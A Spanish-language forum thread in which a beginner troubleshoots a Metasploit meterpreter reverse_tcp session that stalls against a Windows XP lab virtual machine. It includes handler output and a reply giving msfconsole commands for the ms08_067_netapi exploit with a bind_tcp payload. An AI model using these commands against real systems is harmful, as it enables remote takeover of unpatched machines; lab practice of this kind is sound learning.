Buen día estimados.
Estoy intentando obtener la meterpreter a través de reverse_tcp en Windows desde Linux con el metasploit.
El problema es que una shell consigo obtener perfectamente. Cuando la máquina víctima ejecuta el
.exe que generé anteriormente, no hay problema; si intento obtener una sesión meterpreter, la salida en el metasploit es la siguiente:
Citar
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST 192.168.1.102 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(handler) > exploit
- Started reverse handler on 192.168.1.102:4444
- Starting the payload handler...
- Sending stage (752128 bytes) to 192.168.1.110
El problema es que se queda en
- Sending stage (752128 bytes) to 192.168.1.110[/b]
y luego no pasa nada.
Soy principiante, recién ayer me puse a ver todo ésto del Metasploit y la verdad me interesa muchísimo; mis intenciones no son malas en ningún lugar, por eso hago pruebas locales, simplemente para aprender a proteger mi propio equipo por empezar.
La máquina víctima es una máquina virtual con Windows XP SP3 "pelado" (entendiéndose el término "pelado" como a un windows recién instalado, y sin ningun soft extra)
Saludos y gracias.
juega a cambiar la EXITFUNC
amigo intenta esto y después comenta:
use exploit /windows/smb/ms08_067_netapi
set rhost 192.xxx.x.xx (ip victima )
set payload windows/meterpreter/bind_tcp
set lhost 192.xxx.x.xx (ip atacante)
explloit
si tu sistema es xp virgen (pelado ) si no consigues el Shell lee esto quizás hay esta tu respuesta http://www.blackploit.com/2009/11/por-que-no-consigo-shell-con-mi.html